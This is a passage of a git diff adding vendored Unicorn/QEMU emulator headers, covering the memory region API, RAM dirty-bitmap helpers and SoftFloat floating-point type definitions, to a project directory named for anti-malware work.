+ * memory_region_init: Initialize a memory region + * + * The region typically acts as a container for other memory regions. Use + * memory_region_add_subregion() to add subregions. + * + * @mr: the #MemoryRegion to be initialized + * @owner: the object that tracks the region's reference count + * @name: used for debugging; not visible to the user or ABI + * @size: size of the region; any subregions beyond this size will be clipped + */ +void memory_region_init(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + uint64_t size); + +/** + * memory_region_ref: Add 1 to a memory region's reference count + * + * Whenever memory regions are accessed outside the BQL, they need to be + * preserved against hot-unplug. MemoryRegions actually do not have their + * own reference count; they piggyback on a QOM object, their "owner". + * This function adds a reference to the owner. + * + * All MemoryRegions must have an owner if they can disappear, even if the + * device they belong to operates exclusively under the BQL. This is because + * the region could be returned at any time by memory_region_find, and this + * is usually under guest control. + * + * @mr: the #MemoryRegion + */ +void memory_region_ref(MemoryRegion *mr); + +/** + * memory_region_unref: Remove 1 to a memory region's reference count + * + * Whenever memory regions are accessed outside the BQL, they need to be + * preserved against hot-unplug. MemoryRegions actually do not have their + * own reference count; they piggyback on a QOM object, their "owner". + * This function removes a reference to the owner and possibly destroys it. + * + * @mr: the #MemoryRegion + */ +void memory_region_unref(MemoryRegion *mr); + +/** + * memory_region_init_io: Initialize an I/O memory region. + * + * Accesses into the region will cause the callbacks in @ops to be called. + * if @size is nonzero, subregions will be clipped to @size. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @ops: a structure containing read and write callbacks to be used when + * I/O is performed on the region. + * @opaque: passed to to the read and write callbacks of the @ops structure. + * @name: used for debugging; not visible to the user or ABI + * @size: size of the region. + */ +void memory_region_init_io(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const MemoryRegionOps *ops, + void *opaque, + const char *name, + uint64_t size); + +/** + * memory_region_init_ram: Initialize RAM memory region. Accesses into the + * region will modify memory directly. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @name: the name of the region. + * @size: size of the region. + * @perms: permissions on the region (UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC). + * @errp: pointer to Error*, to store an error if it happens. + */ +void memory_region_init_ram(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + uint64_t size, + uint32_t perms, + Error **errp); + +/** + * memory_region_init_ram_ptr: Initialize RAM memory region from a + * user-provided pointer. Accesses into the + * region will modify memory directly. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @name: the name of the region. + * @size: size of the region. + * @ptr: memory to be mapped; must contain at least @size bytes. + */ +void memory_region_init_ram_ptr(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + uint64_t size, + void *ptr); + +/** + * memory_region_init_alias: Initialize a memory region that aliases all or a + * part of another memory region. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @name: used for debugging; not visible to the user or ABI + * @orig: the region to be referenced; @mr will be equivalent to + * @orig between @offset and @offset + @size - 1. + * @offset: start of the section in @orig to be referenced. + * @size: size of the region. + */ +void memory_region_init_alias(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + MemoryRegion *orig, + hwaddr offset, + uint64_t size); + +/** + * memory_region_init_rom_device: Initialize a ROM memory region. Writes are + * handled via callbacks. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @ops: callbacks for write access handling. + * @name: the name of the region. + * @size: size of the region. + * @errp: pointer to Error*, to store an error if it happens. + */ +void memory_region_init_rom_device(MemoryRegion *mr, + struct Object *owner, + const MemoryRegionOps *ops, + void *opaque, + const char *name, + uint64_t size, + Error **errp); + +/** + * memory_region_init_reservation: Initialize a memory region that reserves + * I/O space. + * + * A reservation region primariy serves debugging purposes. It claims I/O + * space that is not supposed to be handled by QEMU itself. Any access via + * the memory API will cause an abort(). + * + * @mr: the #MemoryRegion to be initialized + * @owner: the object that tracks the region's reference count + * @name: used for debugging; not visible to the user or ABI + * @size: size of the region. + */ +void memory_region_init_reservation(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + uint64_t size); + +/** + * memory_region_init_iommu: Initialize a memory region that translates + * addresses + * + * An IOMMU region translates addresses and forwards accesses to a target + * memory region. + * + * @mr: the #MemoryRegion to be initialized + * @owner: the object that tracks the region's reference count + * @ops: a function that translates addresses into the @target region + * @name: used for debugging; not visible to the user or ABI + * @size: size of the region. + */ +void memory_region_init_iommu(MemoryRegion *mr, + struct Object *owner, + const MemoryRegionIOMMUOps *ops, + const char *name, + uint64_t size); + +/** + * memory_region_size: get a memory region's size. + * + * @mr: the memory region being queried. + */ +uint64_t memory_region_size(MemoryRegion *mr); + +/** + * memory_region_is_ram: check whether a memory region is random access + * + * Returns %true is a memory region is random access. + * + * @mr: the memory region being queried + */ +bool memory_region_is_ram(MemoryRegion *mr); + +/** + * memory_region_is_skip_dump: check whether a memory region should not be + * dumped + * + * Returns %true is a memory region should not be dumped(e.g. VFIO BAR MMAP). + * + * @mr: the memory region being queried + */ +bool memory_region_is_skip_dump(MemoryRegion *mr); + +/** + * memory_region_set_skip_dump: Set skip_dump flag, dump will ignore this memory + * region + * + * @mr: the memory region being queried + */ +void memory_region_set_skip_dump(MemoryRegion *mr); + +/** + * memory_region_is_romd: check whether a memory region is in ROMD mode + * + * Returns %true if a memory region is a ROM device and currently set to allow + * direct reads. + * + * @mr: the memory region being queried + */ +static inline bool memory_region_is_romd(MemoryRegion *mr) +{ + return mr->rom_device && mr->romd_mode; +} + +/** + * memory_region_is_iommu: check whether a memory region is an iommu + * + * Returns %true is a memory region is an iommu. + * + * @mr: the memory region being queried + */ +bool memory_region_is_iommu(MemoryRegion *mr); + +/** + * memory_region_notify_iommu: notify a change in an IOMMU translation entry. + * + * @mr: the memory region that was changed + * @entry: the new entry in the IOMMU translation table. The entry + * replaces all old entries for the same virtual I/O address range. + * Deleted entries have .@perm == 0. + */ +void memory_region_notify_iommu(MemoryRegion *mr, + IOMMUTLBEntry entry); + +/** + * memory_region_name: get a memory region's name + * + * Returns the string that was used to initialize the memory region. + * + * @mr: the memory region being queried + */ +const char *memory_region_name(const MemoryRegion *mr); + +/** + * memory_region_is_logging: return whether a memory region is logging writes + * + * Returns %true if the memory region is logging writes + * + * @mr: the memory region being queried + */ +bool memory_region_is_logging(MemoryRegion *mr); + +/** + * memory_region_is_rom: check whether a memory region is ROM + * + * Returns %true is a memory region is read-only memory. + * + * @mr: the memory region being queried + */ +bool memory_region_is_rom(MemoryRegion *mr); + +/** + * memory_region_get_fd: Get a file descriptor backing a RAM memory region. + * + * Returns a file descriptor backing a file-based RAM memory region, + * or -1 if the region is not a file-based RAM memory region. + * + * @mr: the RAM or alias memory region being queried. + */ +int memory_region_get_fd(MemoryRegion *mr); + +/** + * memory_region_get_ram_ptr: Get a pointer into a RAM memory region. + * + * Returns a host pointer to a RAM memory region (created with + * memory_region_init_ram() or memory_region_init_ram_ptr()). Use with + * care. + * + * @mr: the memory region being queried. + */ +void *memory_region_get_ram_ptr(MemoryRegion *mr); + +/** + * memory_region_set_readonly: Turn a memory region read-only (or read-write) + * + * Allows a memory region to be marked as read-only (turning it into a ROM). + * only useful on RAM regions. + * + * @mr: the region being updated. + * @readonly: whether rhe region is to be ROM or RAM. + */ +void memory_region_set_readonly(MemoryRegion *mr, bool readonly); + +/** + * memory_region_rom_device_set_romd: enable/disable ROMD mode + * + * Allows a ROM device (initialized with memory_region_init_rom_device() to + * set to ROMD mode (default) or MMIO mode. When it is in ROMD mode, the + * device is mapped to guest memory and satisfies read access directly. + * When in MMIO mode, reads are forwarded to the #MemoryRegion.read function. + * Writes are always handled by the #MemoryRegion.write function. + * + * @mr: the memory region to be updated + * @romd_mode: %true to put the region into ROMD mode + */ +void memory_region_rom_device_set_romd(MemoryRegion *mr, bool romd_mode); + +/** + * memory_region_add_subregion: Add a subregion to a container. + * + * Adds a subregion at @offset. The subregion may not overlap with other + * subregions (except for those explicitly marked as overlapping). A region + * may only be added once as a subregion (unless removed with + * memory_region_del_subregion()); use memory_region_init_alias() if you + * want a region to be a subregion in multiple locations. + * + * @mr: the region to contain the new subregion; must be a container + * initialized with memory_region_init(). + * @offset: the offset relative to @mr where @subregion is added. + * @subregion: the subregion to be added. + */ +void memory_region_add_subregion(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion); +/** + * memory_region_add_subregion_overlap: Add a subregion to a container + * with overlap. + * + * Adds a subregion at @offset. The subregion may overlap with other + * subregions. Conflicts are resolved by having a higher @priority hide a + * lower @priority. Subregions without priority are taken as @priority 0. + * A region may only be added once as a subregion (unless removed with + * memory_region_del_subregion()); use memory_region_init_alias() if you + * want a region to be a subregion in multiple locations. + * + * @mr: the region to contain the new subregion; must be a container + * initialized with memory_region_init(). + * @offset: the offset relative to @mr where @subregion is added. + * @subregion: the subregion to be added. + * @priority: used for resolving overlaps; highest priority wins. + */ +void memory_region_add_subregion_overlap(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion, + int priority); + +/** + * memory_region_get_ram_addr: Get the ram address associated with a memory + * region + * + * DO NOT USE THIS FUNCTION. This is a temporary workaround while the Xen + * code is being reworked. + */ +ram_addr_t memory_region_get_ram_addr(MemoryRegion *mr); + +uint64_t memory_region_get_alignment(const MemoryRegion *mr); + +/** + * memory_region_del_subregion: Remove a subregion. + * + * Removes a subregion from its container. + * + * @mr: the container to be updated. + * @subregion: the region being removed; must be a current subregion of @mr. + */ +void memory_region_del_subregion(MemoryRegion *mr, + MemoryRegion *subregion); + +/* + * memory_region_set_enabled: dynamically enable or disable a region + * + * Enables or disables a memory region. A disabled memory region + * ignores all accesses to itself and its subregions. It does not + * obscure sibling subregions with lower priority - it simply behaves as + * if it was removed from the hierarchy. + * + * Regions default to being enabled. + * + * @mr: the region to be updated + * @enabled: whether to enable or disable the region + */ +void memory_region_set_enabled(MemoryRegion *mr, bool enabled); + +/* + * memory_region_set_address: dynamically update the address of a region + * + * Dynamically updates the address of a region, relative to its container. + * May be used on regions are currently part of a memory hierarchy. + * + * @mr: the region to be updated + * @addr: new address, relative to container region + */ +void memory_region_set_address(MemoryRegion *mr, hwaddr addr); + +/* + * memory_region_set_alias_offset: dynamically update a memory alias's offset + * + * Dynamically updates the offset into the target region that an alias points + * to, as if the fourth argument to memory_region_init_alias() has changed. + * + * @mr: the #MemoryRegion to be updated; should be an alias. + * @offset: the new offset into the target memory region + */ +void memory_region_set_alias_offset(MemoryRegion *mr, + hwaddr offset); + +/** + * memory_region_present: checks if an address relative to a @container + * translates into #MemoryRegion within @container + * + * Answer whether a #MemoryRegion within @container covers the address + * @addr. + * + * @container: a #MemoryRegion within which @addr is a relative address + * @addr: the area within @container to be searched + */ +bool memory_region_present(MemoryRegion *container, hwaddr addr); + +/** + * memory_region_is_mapped: returns true if #MemoryRegion is mapped + * into any address space. + * + * @mr: a #MemoryRegion which should be checked if it's mapped + */ +bool memory_region_is_mapped(MemoryRegion *mr); + +/** + * memory_region_find: translate an address/size relative to a + * MemoryRegion into a #MemoryRegionSection. + * + * Locates the first #MemoryRegion within @mr that overlaps the range + * given by @addr and @size. + * + * Returns a #MemoryRegionSection that describes a contiguous overlap. + * It will have the following characteristics: + * .@size = 0 iff no overlap was found + * .@mr is non-%NULL iff an overlap was found + * + * Remember that in the return value the @offset_within_region is + * relative to the returned region (in the .@mr field), not to the + * @mr argument. + * + * Similarly, the .@offset_within_address_space is relative to the + * address space that contains both regions, the passed and the + * returned one. However, in the special case where the @mr argument + * has no container (and thus is the root of the address space), the + * following will hold: + * .@offset_within_address_space >= @addr + * .@offset_within_address_space + .@size <= @addr + @size + * + * @mr: a MemoryRegion within which @addr is a relative address + * @addr: start of the area within @as to be searched + * @size: size of the area to be searched + */ +MemoryRegionSection memory_region_find(MemoryRegion *mr, + hwaddr addr, uint64_t size); + +/** + * memory_region_transaction_begin: Start a transaction. + * + * During a transaction, changes will be accumulated and made visible + * only when the transaction ends (is committed). + */ +void memory_region_transaction_begin(struct uc_struct*); + +/** + * memory_region_transaction_commit: Commit a transaction and make changes + * visible to the guest. + */ +void memory_region_transaction_commit(struct uc_struct*); + +/** + * memory_listener_register: register callbacks to be called when memory + * sections are mapped or unmapped into an address + * space + * + * @listener: an object containing the callbacks to be called + * @filter: if non-%NULL, only regions in this address space will be observed + */ +void memory_listener_register(struct uc_struct* uc, MemoryListener *listener, AddressSpace *filter); + +/** + * memory_listener_unregister: undo the effect of memory_listener_register() + * + * @listener: an object containing the callbacks to be removed + */ +void memory_listener_unregister(struct uc_struct* uc, MemoryListener *listener); + +/** + * address_space_init: initializes an address space + * + * @as: an uninitialized #AddressSpace + * @root: a #MemoryRegion that routes addesses for the address space + * @name: an address space name. The name is only used for debugging + * output. + */ +void address_space_init(struct uc_struct *uc, AddressSpace *as, MemoryRegion *root, const char *name); + + +/** + * address_space_destroy: destroy an address space + * + * Releases all resources associated with an address space. After an address space + * is destroyed, its root memory region (given by address_space_init()) may be destroyed + * as well. + * + * @as: address space to be destroyed + */ +void address_space_destroy(AddressSpace *as); + +/** + * address_space_rw: read from or write to an address space. + * + * Return true if the operation hit any unassigned memory or encountered an + * IOMMU fault. + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @buf: buffer with the data transferred + * @is_write: indicates the transfer direction + */ +bool address_space_rw(AddressSpace *as, hwaddr addr, uint8_t *buf, + int len, bool is_write); + +/** + * address_space_write: write to address space. + * + * Return true if the operation hit any unassigned memory or encountered an + * IOMMU fault. + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @buf: buffer with the data transferred + */ +bool address_space_write(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len); + +/** + * address_space_read: read from an address space. + * + * Return true if the operation hit any unassigned memory or encountered an + * IOMMU fault. + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @buf: buffer with the data transferred + */ +bool address_space_read(AddressSpace *as, hwaddr addr, uint8_t *buf, int len); + +/* address_space_translate: translate an address range into an address space + * into a MemoryRegion and an address range into that section + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @xlat: pointer to address within the returned memory region section's + * #MemoryRegion. + * @len: pointer to length + * @is_write: indicates the transfer direction + */ +MemoryRegion *address_space_translate(AddressSpace *as, hwaddr addr, + hwaddr *xlat, hwaddr *len, + bool is_write); + +/* address_space_access_valid: check for validity of accessing an address + * space range + * + * Check whether memory is assigned to the given address space range, and + * access is permitted by any IOMMU regions that are active for the address + * space. + * + * For now, addr and len should be aligned to a page size. This limitation + * will be lifted in the future. + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @len: length of the area to be checked + * @is_write: indicates the transfer direction + */ +bool address_space_access_valid(AddressSpace *as, hwaddr addr, int len, bool is_write); + +/* address_space_map: map a physical memory region into a host virtual address + * + * May map a subset of the requested range, given by and returned in @plen. + * May return %NULL if resources needed to perform the mapping are exhausted. + * Use only for reads OR writes - not for read-modify-write operations. + * Use cpu_register_map_client() to know when retrying the map operation is + * likely to succeed. + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @plen: pointer to length of buffer; updated on return + * @is_write: indicates the transfer direction + */ +void *address_space_map(AddressSpace *as, hwaddr addr, + hwaddr *plen, bool is_write); + +/* address_space_unmap: Unmaps a memory region previously mapped by address_space_map() + * + * Will also mark the memory as dirty if @is_write == %true. @access_len gives + * the amount of memory that was actually read or written by the caller. + * + * @as: #AddressSpace used + * @addr: address within that address space + * @len: buffer length as returned by address_space_map() + * @access_len: amount of data actually transferred + * @is_write: indicates the transfer direction + */ +void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len, + int is_write, hwaddr access_len); + + +void memory_register_types(struct uc_struct *uc); + +MemoryRegion *memory_map(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms); +MemoryRegion *memory_map_ptr(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms, void *ptr); +void memory_unmap(struct uc_struct *uc, MemoryRegion *mr); +int memory_free(struct uc_struct *uc); + +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ram_addr.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ram_addr.h new file mode 100644 index 0000000..5e614e5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ram_addr.h @@ -0,0 +1,163 @@ +/* + * Declarations for cpu physical memory functions + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity <avi@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * later. See the COPYING file in the top-level directory. + * + */ + +/* + * This header is for use by exec.c and memory.c ONLY. Do not include it. + * The functions declared here will be removed soon. + */ + +#ifndef RAM_ADDR_H +#define RAM_ADDR_H + +#include "uc_priv.h" + +#ifndef CONFIG_USER_ONLY + +ram_addr_t qemu_ram_alloc_from_ptr(ram_addr_t size, void *host, + MemoryRegion *mr, Error **errp); +ram_addr_t qemu_ram_alloc(ram_addr_t size, MemoryRegion *mr, Error **errp); +int qemu_get_ram_fd(struct uc_struct *uc, ram_addr_t addr); +void *qemu_get_ram_block_host_ptr(struct uc_struct *uc, ram_addr_t addr); +void *qemu_get_ram_ptr(struct uc_struct *uc, ram_addr_t addr); +void qemu_ram_free(struct uc_struct *c, ram_addr_t addr); +void qemu_ram_free_from_ptr(struct uc_struct *uc, ram_addr_t addr); + +static inline bool cpu_physical_memory_get_dirty(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length, + unsigned client) +{ + unsigned long end, page, next; + + assert(client < DIRTY_MEMORY_NUM); + + end = TARGET_PAGE_ALIGN(start + length) >> TARGET_PAGE_BITS; + page = start >> TARGET_PAGE_BITS; + next = find_next_bit(uc->ram_list.dirty_memory[client], end, page); + + return next < end; +} + +static inline bool cpu_physical_memory_get_clean(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length, + unsigned client) +{ + unsigned long end, page, next; + + assert(client < DIRTY_MEMORY_NUM); + + end = TARGET_PAGE_ALIGN(start + length) >> TARGET_PAGE_BITS; + page = start >> TARGET_PAGE_BITS; + next = find_next_zero_bit(uc->ram_list.dirty_memory[client], end, page); + + return next < end; +} + +static inline bool cpu_physical_memory_get_dirty_flag(struct uc_struct *uc, ram_addr_t addr, + unsigned client) +{ + return cpu_physical_memory_get_dirty(uc, addr, 1, client); +} + +static inline bool cpu_physical_memory_is_clean(struct uc_struct *uc, ram_addr_t addr) +{ + return !cpu_physical_memory_get_dirty_flag(uc, addr, DIRTY_MEMORY_CODE); +} + +static inline bool cpu_physical_memory_range_includes_clean(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length) +{ + return cpu_physical_memory_get_clean(uc, start, length, DIRTY_MEMORY_CODE); +} + +static inline void cpu_physical_memory_set_dirty_flag(struct uc_struct *uc, ram_addr_t addr, + unsigned client) +{ + assert(client < DIRTY_MEMORY_NUM); + set_bit(addr >> TARGET_PAGE_BITS, uc->ram_list.dirty_memory[client]); +} + +static inline void cpu_physical_memory_set_dirty_range(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length) +{ + unsigned long end, page; + + end = TARGET_PAGE_ALIGN(start + length) >> TARGET_PAGE_BITS; + page = start >> TARGET_PAGE_BITS; + qemu_bitmap_set(uc->ram_list.dirty_memory[DIRTY_MEMORY_CODE], page, end - page); +} + +#if !defined(_WIN32) +static inline void cpu_physical_memory_set_dirty_lebitmap(struct uc_struct *uc, unsigned long *bitmap, + ram_addr_t start, + ram_addr_t pages) +{ + unsigned long i, j; + unsigned long page_number, c; + hwaddr addr; + ram_addr_t ram_addr; + unsigned long len = (pages + HOST_LONG_BITS - 1) / HOST_LONG_BITS; + unsigned long hpratio = getpagesize() / TARGET_PAGE_SIZE; + unsigned long page = BIT_WORD(start >> TARGET_PAGE_BITS); + + /* start address is aligned at the start of a word? */ + if ((((page * BITS_PER_LONG) << TARGET_PAGE_BITS) == start) && + (hpratio == 1)) { + long k; + long nr = BITS_TO_LONGS(pages); + + for (k = 0; k < nr; k++) { + if (bitmap[k]) { + unsigned long temp = leul_to_cpu(bitmap[k]); + uc->ram_list.dirty_memory[DIRTY_MEMORY_CODE][page + k] |= temp; + } + } + } else { + /* + * bitmap-traveling is faster than memory-traveling (for addr...) + * especially when most of the memory is not dirty. + */ + for (i = 0; i < len; i++) { + if (bitmap[i] != 0) { + c = leul_to_cpu(bitmap[i]); + do { + j = ctzl(c); + c &= ~(1ul << j); + page_number = (i * HOST_LONG_BITS + j) * hpratio; + addr = page_number * TARGET_PAGE_SIZE; + ram_addr = start + addr; + cpu_physical_memory_set_dirty_range(uc, ram_addr, + TARGET_PAGE_SIZE * hpratio); + } while (c != 0); + } + } + } +} +#endif /* not _WIN32 */ + +static inline void cpu_physical_memory_clear_dirty_range(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length, + unsigned client) +{ + unsigned long end, page; + + assert(client < DIRTY_MEMORY_NUM); + end = TARGET_PAGE_ALIGN(start + length) >> TARGET_PAGE_BITS; + page = start >> TARGET_PAGE_BITS; + qemu_bitmap_clear(uc->ram_list.dirty_memory[client], page, end - page); +} + +void cpu_physical_memory_reset_dirty(struct uc_struct *uc, + ram_addr_t start, ram_addr_t length, unsigned client); + +#endif +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/fpu/softfloat.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/fpu/softfloat.h new file mode 100644 index 0000000..d15678d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/fpu/softfloat.h @@ -0,0 +1,741 @@ +/* + * QEMU float support + * + * Derived from SoftFloat. + */ + +/*============================================================================ + +This C header file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic +Package, Release 2b. + +Written by John R. Hauser. This work was made possible in part by the +International Computer Science Institute, located at Suite 600, 1947 Center +Street, Berkeley, California 94704. Funding was partially provided by the +National Science Foundation under grant MIP-9311980. The original version +of this code was written as part of a project to build a fixed-point vector +processor in collaboration with the University of California at Berkeley, +overseen by Profs. Nelson Morgan and John Wawrzynek. More information +is available through the Web page `http://www.cs.berkeley.edu/~jhauser/ +arithmetic/SoftFloat.html'. + +THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has +been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES +RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS +AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ALL LOSSES, +COSTS, OR OTHER PROBLEMS THEY INCUR DUE TO THE SOFTWARE, AND WHO FURTHERMORE +EFFECTIVELY INDEMNIFY JOHN HAUSER AND THE INTERNATIONAL COMPUTER SCIENCE +INSTITUTE (possibly via similar legal warning) AGAINST ALL LOSSES, COSTS, OR +OTHER PROBLEMS INCURRED BY THEIR CUSTOMERS AND CLIENTS DUE TO THE SOFTWARE. + +Derivative works are acceptable, even for commercial purposes, so long as +(1) the source code for the derivative work includes prominent notice that +the work is derivative, and (2) the source code includes prominent notice with +these four paragraphs for those parts of this code that are retained. + +=============================================================================*/ + +#ifndef SOFTFLOAT_H +#define SOFTFLOAT_H + +#if defined(CONFIG_SOLARIS) && defined(CONFIG_NEEDS_LIBSUNMATH) +#include <sunmath.h> +#endif + +#include "unicorn/platform.h" +#include "config-host.h" +#include "qemu/osdep.h" + +/*---------------------------------------------------------------------------- +| Each of the following `typedef's defines the most convenient type that holds +| integers of at least as many bits as specified. For example, `uint8' should +| be the most convenient type that can hold unsigned integers of as many as +| 8 bits. The `flag' type must be able to hold either a 0 or 1. For most +| implementations of C, `flag', `uint8', and `int8' should all be `typedef'ed +| to the same as `int'. +*----------------------------------------------------------------------------*/ +typedef uint8_t flag; +typedef uint8_t uint8; +typedef int8_t int8; +typedef unsigned int uint32; +typedef signed int int32; +typedef uint64_t uint64; +typedef int64_t int64; + +#define LIT64( a ) a##LL + +#define STATUS_PARAM , float_status *status +#define STATUS(field) status->field +#define STATUS_VAR , status + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point ordering relations +*----------------------------------------------------------------------------*/ +enum { + float_relation_less = -1, + float_relation_equal = 0, + float_relation_greater = 1, + float_relation_unordered = 2 +}; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point types. +*----------------------------------------------------------------------------*/ +/* Use structures for soft-float types. This prevents accidentally mixing + them with native int/float types. A sufficiently clever compiler and + sane ABI should be able to see though these structs. However + x86/gcc 3.x seems to struggle a bit, so leave them disabled by default. */ +//#define USE_SOFTFLOAT_STRUCT_TYPES +#ifdef USE_SOFTFLOAT_STRUCT_TYPES +typedef struct { + uint16_t v; +} float16; +#define float16_val(x) (((float16)(x)).v) +#define make_float16(x) __extension__ ({ float16 f16_val = {x}; f16_val; }) +#define const_float16(x) { x } +typedef struct { + uint32_t v; +} float32; +/* The cast ensures an error if the wrong type is passed. */ +#define float32_val(x) (((float32)(x)).v) +#define make_float32(x) __extension__ ({ float32 f32_val = {x}; f32_val; }) +#define const_float32(x) { x } +typedef struct { + uint64_t v; +} float64; +#define float64_val(x) (((float64)(x)).v) +#define make_float64(x) __extension__ ({ float64 f64_val = {x}; f64_val; }) +#define const_float64(x) { x } +#else +typedef uint16_t float16; +typedef uint32_t float32; +typedef uint64_t float64; +#define float16_val(x) (x) +#define float32_val(x) (x) +#define float64_val(x) (x) +#define make_float16(x) (x) +#define make_float32(x) (x) +#define make_float64(x) (x) +#define const_float16(x) (x) +#define const_float32(x) (x) +#define const_float64(x) (x) +#endif +typedef struct { + uint64_t low; + uint16_t high; +} floatx80; +#define make_floatx80(exp, mant) ((floatx80) { mant, exp }) +#define make_floatx80_init(exp, mant) { mant, exp } +typedef struct { +#ifdef HOST_WORDS_BIGENDIAN + uint64_t high, low; +#else + uint64_t low, high; +#endif +} float128; +#ifdef HOST_WORDS_BIGENDIAN +#define make_float128(high_, low_) ((float128) { high_, low_ }) +#define make_float128_init(high_, low_) { high_, low_ } +#else +#define make_float128(high_, low_) ((float128) { low_, high_ }) +#define make_float128_init(high_, low_) { low_, high_ } +#endif + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point underflow tininess-detection mode. +*----------------------------------------------------------------------------*/ +enum { + float_tininess_after_rounding = 0, + float_tininess_before_rounding = 1 +}; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point rounding mode. +*----------------------------------------------------------------------------*/ +enum { + float_round_nearest_even = 0, + float_round_down = 1, + float_round_up = 2, + float_round_to_zero = 3, + float_round_ties_away = 4, +}; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point exception flags. +*----------------------------------------------------------------------------*/ +enum { + float_flag_invalid = 1, + float_flag_divbyzero = 4, + float_flag_overflow = 8, + float_flag_underflow = 16, + float_flag_inexact = 32, + float_flag_input_denormal = 64, + float_flag_output_denormal = 128 +}; + +typedef struct float_status { + signed char float_detect_tininess; + signed char float_rounding_mode; + signed char float_exception_flags; + signed char floatx80_rounding_precision; + /* should denormalised results go to zero and set the inexact flag? */ + flag flush_to_zero; + /* should denormalised inputs go to zero and set the input_denormal flag? */ + flag flush_inputs_to_zero; + flag default_nan_mode; +} float_status; + +static inline void set_float_detect_tininess(int val STATUS_PARAM) +{ + STATUS(float_detect_tininess) = val; +} +static inline void set_float_rounding_mode(int val STATUS_PARAM) +{ + STATUS(float_rounding_mode) = val; +} +static inline void set_float_exception_flags(int val STATUS_PARAM) +{ + STATUS(float_exception_flags) = val; +} +static inline void set_floatx80_rounding_precision(int val STATUS_PARAM) +{ + STATUS(floatx80_rounding_precision) = val; +} +static inline void set_flush_to_zero(flag val STATUS_PARAM) +{ + STATUS(flush_to_zero) = val; +} +static inline void set_flush_inputs_to_zero(flag val STATUS_PARAM) +{ + STATUS(flush_inputs_to_zero) = val; +} +static inline void set_default_nan_mode(flag val STATUS_PARAM) +{ + STATUS(default_nan_mode) = val; +} +static inline int get_float_detect_tininess(float_status *status) +{ + return STATUS(float_detect_tininess); +} +static inline int get_float_rounding_mode(float_status *status) +{ + return STATUS(float_rounding_mode); +} +static inline int get_float_exception_flags(float_status *status) +{ + return STATUS(float_exception_flags); +} +static inline int get_floatx80_rounding_precision(float_status *status) +{ + return STATUS(floatx80_rounding_precision); +} +static inline flag get_flush_to_zero(float_status *status) +{ + return STATUS(flush_to_zero); +} +static inline flag get_flush_inputs_to_zero(float_status *status) +{ + return STATUS(flush_inputs_to_zero); +} +static inline flag get_default_nan_mode(float_status *status) +{ + return STATUS(default_nan_mode); +} + +/*---------------------------------------------------------------------------- +| Routine to raise any or all of the software IEC/IEEE floating-point +| exception flags. +*----------------------------------------------------------------------------*/ +void float_raise( uint8_t flags STATUS_PARAM); + +/*---------------------------------------------------------------------------- +| If `a' is denormal and we are in flush-to-zero mode then set the +| input-denormal exception and return zero. Otherwise just return the value. +*----------------------------------------------------------------------------*/ +float32 float32_squash_input_denormal(float32 a STATUS_PARAM); +float64 float64_squash_input_denormal(float64 a STATUS_PARAM); + +/*---------------------------------------------------------------------------- +| Options to indicate which negations to perform in float*_muladd() +| Using these differs from negating an input or output before calling +| the muladd function in that this means that a NaN doesn't have its +| sign bit inverted before it is propagated. +| We also support halving the result before rounding, as a special +| case to support the ARM fused-sqrt-step instruction FRSQRTS. +*----------------------------------------------------------------------------*/ +enum { + float_muladd_negate_c = 1, + float_muladd_negate_product = 2, + float_muladd_negate_result = 4, + float_muladd_halve_result = 8, +}; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE integer-to-floating-point conversion routines. +*----------------------------------------------------------------------------*/ +float32 int32_to_float32(int32_t STATUS_PARAM); +float64 int32_to_float64(int32_t 